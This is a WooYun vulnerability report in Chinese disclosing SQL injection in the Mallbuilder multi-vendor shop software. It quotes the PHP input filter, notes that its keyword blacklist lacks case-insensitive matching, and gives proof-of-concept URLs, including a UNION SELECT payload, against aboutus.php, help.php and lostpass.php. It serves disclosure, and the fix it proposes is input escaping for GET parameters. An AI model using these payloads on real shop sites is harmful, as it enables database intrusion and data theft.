当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-063213

漏洞标题:Mallbuilder(多用户商城) 多枚注入点

相关厂商:Mallbuilder

漏洞作者: ′雨。

提交时间:2014-06-03 12:23

修复时间:2014-09-01 12:28

公开时间:2014-09-01 12:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-06-03: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-01: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

Check。

详细说明:

首先来看看全局文件

function magic()
{
	if(!get_magic_quotes_gpc()&&isset($_POST))
	{
		foreach($_POST as $key=>$v)
		{
			if(!is_array($v))
				$_POST[$key]=addslashes($v);
			else
			{
				foreach($v as $skey=>$sv)
				{
					if(!is_array($sv))
						$_POST[$key][$skey]=addslashes($sv);
					else
					{
						if($sssv)
						{
							foreach($sv as $sskey=>$ssv)
							{
								if(!is_array($ssv))
									$_POST[$key][$skey][$sskey]=addslashes($ssv);
								else	
								{
									if($sssv)
									{
										foreach($ssv as $ssskey=>$sssv)
										{
											if(!is_array($sssv))
												$_POST[$key][$skey][$sskey][$ssskey]=addslashes($sssv);
											else	
											{
												if($sssv)
												{
													foreach($sssv as $sssskey=>$ssssv)
													{
														$_POST[$key][$skey][$sskey][$ssskey][$sssskey]=addslashes($ssssv);
													}
												}
											}
										}


只对post进行了addslashes 没有对GET 等其他的进行addslashes
但是对GET有一个小过滤。

if(inject_check(implode('',$_GET)))
	{
		die('Invalid URL !');
	}


function inject_check($sql)
{ 
	return preg_match("/^select|insert|delete|\.\.\/|\.\/|union|into|load_file|outfile/", $sql);// 进行过滤   
}


这里匹配到了就退出 但是他这里没有开启/i 修正符
所以大小写就可以绕过了。
绕过了这里 GET的注入点就是一大堆了。

漏洞证明:

第一处
在aboutus.php中
http://web.com/mallbuilder/aboutus.php?type=asd' UNION SELECT 1,2,3,4,5,6,7%23

http://web.com/mallbuilder/help.php?type=asd'

http://web.com/mallbuilder/lostpass.php?md5=aa&userid=aa'
还有很多 我就只贴这点了。

m2.jpg

修复方案:

GET addslashes

版权声明:转载请注明来源 ′雨。@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝